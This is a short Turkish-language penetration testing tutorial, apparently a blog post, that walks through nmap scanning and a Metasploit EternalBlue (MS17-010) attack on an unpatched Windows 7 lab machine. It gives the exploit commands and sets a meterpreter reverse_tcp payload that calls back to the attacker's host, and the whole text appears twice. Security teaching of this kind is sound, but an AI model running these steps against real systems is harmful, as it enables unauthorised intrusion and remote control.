Bu makale kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Kesinlikle yasa dışı bir faaliyet amacıyla kullanmayınız.
Kali Linux “eternalblue” exploit’i kullanarak güncel olmayan (eksik update’li) Windows İşletim Sistemlerine sızma testi yapacağım.
Yöntem: Wanacry MS17-010 SMB1 445/TCP
Kali IP Adres: 1.1.1.3
Windows 7 IP Adres: 1.1.1.4 (Hedef PC)
Kali Linux’te oturum açıyorum.
Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.
Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.
Ping 1.1.1.4
Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.
445/tcp Microsoft-ds port’unu kullanacağım.
MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.
Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4
Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum
Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.
Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.
Use exploit/windows/smb/ms17_010_eternalblue
Set rhost 1.1.1.4
Set payload windows/x64/meterpreter/reverse_tcp
Set lhost 1.1.1.3
Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.
Exploit yada Run komutu kullanılarak hedef sisteme sızıyoruz
Kali Linux “eternalblue” exploit’i kullanarak güncel olmayan (eksik update’li) Windows İşletim Sistemlerine sızma testi yapacağım.
Yöntem: Wanacry MS17-010 SMB1 445/TCP
Kali IP Adres: 1.1.1.3
Windows 7 IP Adres: 1.1.1.4 (Hedef PC)
Kali Linux’te oturum açıyorum.
Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.
Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.
Ping 1.1.1.4
Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.
445/tcp Microsoft-ds port’unu kullanacağım.
MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.
Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4
Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum
Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.
Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.
Use exploit/windows/smb/ms17_010_eternalblue
Set rhost 1.1.1.4
Set payload windows/x64/meterpreter/reverse_tcp
Set lhost 1.1.1.3
Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.
Exploit yada Run komutu kullanılarak hedef sisteme sızıyoruz
